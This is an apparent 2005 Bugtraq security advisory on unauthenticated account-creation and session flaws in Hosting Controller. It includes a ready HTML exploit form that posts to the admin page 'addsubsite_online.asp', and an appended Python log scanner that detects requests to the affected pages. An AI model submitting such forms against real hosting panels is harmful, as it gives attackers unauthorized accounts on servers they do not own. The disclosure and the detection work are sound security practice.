Bugtraq mailing list archives

Bug Hosting Controller New (v6.1 - Hotfix 2.1)
From: kehieuhoc () yahoo com
Date: 11 Jul 2005 08:46:47 -0000

-= KeHieuHoc – HCE GROUP =-

Information
-------------------------
Software Package : Hosting Controller
Vendor Homepage : http://www.hostingcontroller.com
Platforms : Windows based servers
Vulnerability : Multiple unauthenticated information disclosure
Risk : high
Vulnerable Versions : All versions ( Tested on: v.6.1 Hotfix 2.1 )
Vendor Contacted : 09/07/2005
Release Date : 11/07/2005



Summary
------------

Hosting Controller is a complete array of Web hosting automation tools for the Windows Server family platform.

(I)

You can create a new account on Hosting Controller

Exploit :

http://[target]/admin/hosting/addsubsite_online.asp

Code Form:

<FORM action="http://[target]/admin/hosting/addsubsite_online.asp" method="post">
<INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">
Domain: <INPUT name="DomainName" value="hcegroup.net" id="Hidden2"><BR>
Username: <INPUT name="loginname" value="kehieuhoc" id="Hidden3"><BR>
<INPUT type="hidden" name="Quota" value="-1" id="Hidden4">
<INPUT type="hidden" name="htype" value="27" id="htype5" >
<INPUT type="hidden" name="choice" value="1" id="Hidden6" >
Password: <INPUT name="password" value="kehieuhoc" id="Hidden7"><BR><BR>
<input type="submit" value="Make">
</FORM> 



(II)

You can create any “session” that is reserved for the system owner

Exploit :

http://[target]/admin/hosting/dsp_newreseller.asp


(I) and (II) -> have fun 

 
 


Solution
----------

The vendor was notified and has released a patch.

Update your software.



Credits

---------

Discovered on 9 July 2005 by KeHieuHoc – HCE Group


Email: kehieuhoc () yahoo com

 

References

-------------



http://hcegroup.net

 

------------------------------ //  KeHieuHoc – HCE Group \\ ------------------------------
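
For administrators checking whether the two pages named in (I) and (II) were requested on their own servers, the following log scan is an added example and is not part of the original post. It assumes IIS W3C extended logs that include the fields shown in the sample header; the function name, the page labels, the host name panel.example.test and every sample log line are constructed for illustration. A request whose Referer is missing or points off-site is only a hint of a form submitted from elsewhere, as in the form under (I), not proof of abuse.

```python
import re

# Endpoints named in the advisory, lower-cased because IIS paths are case-insensitive.
WATCHED = {
    "/admin/hosting/addsubsite_online.asp": "account creation page",
    "/admin/hosting/dsp_newreseller.asp": "new reseller page",
}

# Constructed sample in IIS W3C extended format; hosts and addresses are made up.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(Referer)
2005-07-11 09:01:10 192.0.2.10 GET /admin/login.asp - 200 -
2005-07-11 09:02:44 198.51.100.7 POST /admin/hosting/addsubsite_online.asp - 200 http://example.invalid/form.html
2005-07-11 09:03:02 198.51.100.7 GET /Admin/Hosting/dsp_newreseller.asp - 200 -
2005-07-11 09:05:30 192.0.2.10 GET /admin/hosting/dsp_newreseller.asp - 200 http://panel.example.test/admin/main.asp
2005-07-11 09:06:00 192.0.2.10 GET /admin/images/logo.gif - 304 http://panel.example.test/admin/main.asp
"""

def scan(log_text, site_host):
    """Return one finding per request to a watched page. 'offsite' is True when
    the Referer is absent or not on site_host (a heuristic, not proof)."""
    fields, findings = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]   # field order can change mid-file
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        stem = row.get("cs-uri-stem", "").lower()
        if stem not in WATCHED:
            continue
        referer = row.get("cs(Referer)", "-")
        host = re.match(r"https?://([^/:]+)", referer)
        offsite = host is None or host.group(1).lower() != site_host.lower()
        findings.append({
            "when": f"{row.get('date')} {row.get('time')}",
            "client": row.get("c-ip"),
            "method": row.get("cs-method"),
            "page": WATCHED[stem],
            "status": row.get("sc-status"),
            "offsite": offsite,
        })
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, "panel.example.test"):
        print(finding)
```

Findings with offsite set to True, and any POST to the account creation page, are the ones to compare against the accounts and resellers that actually exist on the server.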

